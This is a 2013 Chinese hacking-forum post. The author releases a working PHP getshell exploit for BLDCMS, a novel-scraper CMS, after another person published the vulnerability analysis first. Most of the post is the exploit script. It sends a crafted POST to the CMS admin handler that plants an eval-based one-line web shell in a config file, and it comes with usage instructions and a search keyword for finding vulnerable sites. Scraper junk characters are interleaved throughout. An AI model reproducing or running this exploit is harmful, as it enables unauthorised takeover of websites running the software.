之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞# g3 G3 {. w8 K) O# Y4 ~* |
- x. X' X+ F& A; v ' I7 l5 n, w( g/ A7 n7 n
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
( T' n' Y6 @) x; W g
/ T$ w$ T+ O8 v5 b3 M既然都有人发了 我就把我之前写好的EXP放出来吧$ d* O% f7 Q; L
- l3 ?. w! \6 O- V# ]8 R0 M. l& Tview source print?01.php;">0 L) X% ], {, q% u3 m" v: ]
02.<!--?php
" ~* e ?& C- p7 C9 x* X; u$ ~1 |03.echo "-------------------------------------------------------------------: L, T6 p3 f1 C7 Y5 D
04. # J7 r9 J# B3 K9 y
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
! `3 b2 {9 d7 o `8 L06.
0 u0 v( \$ Q7 ^. k6 N07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
# c& l7 `8 T7 N$ L: f08. 7 M0 n1 E+ G3 ^! \
09.QQ:981009941\r\n 2013.3.21\r\n ! I5 N/ t- B' O5 ?" j7 h' ^7 I8 H
10. ) l* f5 G q0 D& J% p& `- \8 d
11. . o4 s8 y) G$ V8 g( `
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
: C4 T( K" \1 o0 p2 T0 c13.
; H- C: t, X) I3 Q14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
9 _7 I$ W1 g1 Q, ~15. # j. }* k% z0 c: s: g( W7 o
16.--------------------------------------------------------------------\r\n";
; C) o1 R+ F" n- J/ j$ D17.$url=$argv[1];
& s/ z& j+ `+ @+ j9 q: u" G18.$dir=$argv[2];7 c5 }/ d `- D$ B; I
19.$pass=$argv[3];
! t% T+ Y3 d ]5 q0 w2 g* q5 h20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';# F2 R0 v3 W. I, x; _! S% W
21.if (emptyempty($pass)||emptyempty($url))6 o, Q" K4 o' H% A0 l2 ^5 H
22.{exit("请输入参数");}) ] T6 A. n" w
23.else
+ v1 ?6 s M" q* L2 _4 \# e! m24.{. r7 r+ w+ `0 M5 W+ T2 |) G6 I8 [
25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
; n- P/ S1 ~2 v. r% Z# m9 w26.
5 Z& ~+ k; A/ Y: Q7 ]) L! b27.al;
# Y ?) }$ X* U+ l28.$length = strlen($fuckdata);
8 P1 D# U! s! G# A% E29.function getshell($url,$pass)" S/ b) h) Q; U" N
30.{
; b4 B" \( a# n3 f/ l8 O31.global $url,$dir,$pass,$eval,$length,$fuckdata;+ l3 d" h- i1 @; _* E% }/ a
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";
v8 E5 G2 _" K* `0 ^* @% S33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
. c, R& E$ I5 z' S& q- V7 M, @34.$header .= "User-Agent: MSIE\r\n";
( e8 R2 l: u* t( q0 y+ L35.$header .= "Host:".$url."\r\n";6 F% t& U7 V5 K8 o2 k
36.$header .= "Content-Length: ".$length."\r\n";7 L* `' q' [4 O: M9 N, L4 d
37.$header .= "Connection: Close\r\n";( q/ `( U! e, F1 G
38.$header .="\r\n";) ^' v7 g" G$ U" `8 ?( h# ?
39.$header .= $fuckdata."\r\n\r\n";
0 T9 l& Y; V, |5 G% K40.$fp = fsockopen($url, 80,$errno,$errstr,15);& ~9 \% T* b# z1 J. P
41.if (!$fp)
( A- ~8 ~0 Y, b: t42.{' r- @/ `& m9 L* j
43.exit ("利用失败:请检查指定目标是否能正常打开");, B" T4 b9 o* A/ I- ^; V
44.}) y- [& q1 ?0 i. {- | f9 i3 r
45.else{ if (!fputs($fp,$header))7 W3 n7 [" h$ o* W
46.{exit ("利用失败");}
9 v9 i& b6 g2 i" W4 I0 O! q% l47.else
! P# r6 K# |/ f% V b1 R48.{
f& c5 O' x( f# d% C49.$receive = '';* k% }2 ]/ @1 a& n' \) t, ^" L
50.while (!feof($fp)) {
$ O3 N4 c- }. I6 G$ |8 r; m5 ?% B51.$receive .= @fgets($fp, 1000);
& v: J* d0 ?( \; T) x( |52.}
% i9 O( ^4 ^! e! M3 H, ]53.@fclose($fp);: v0 ^, V. e/ c# x
54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标; W, |. K: L9 n. F' l
55. 1 |8 T; q% r- d _) s
56.GPC是否=off)";
, _3 E A* d5 _2 W: e9 }57.}}) t/ _( F5 f1 V% \+ M
58.}
- R" t$ n8 r& O% p59.}
1 R7 K; T& C8 b T% X+ R b0 c- _60.getshell($url,$pass);; x5 {# O. s' V9 h9 K L
61.?-->4 ~/ e4 W( e8 |/ A0 g; f
4 Y) @% N, x0 `6 j8 k* I& P" D( Z; ]0 ?
. p& ?1 Z- z( N$ N# E: \
by 数据流
0 v9 S" l# f4 L |
发表于 2013-3-26 20:49:10
收藏
支持
反对